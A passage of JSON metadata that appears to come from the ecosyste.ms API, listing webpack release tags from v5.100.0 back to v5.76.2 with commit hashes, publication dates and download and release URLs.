tml_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/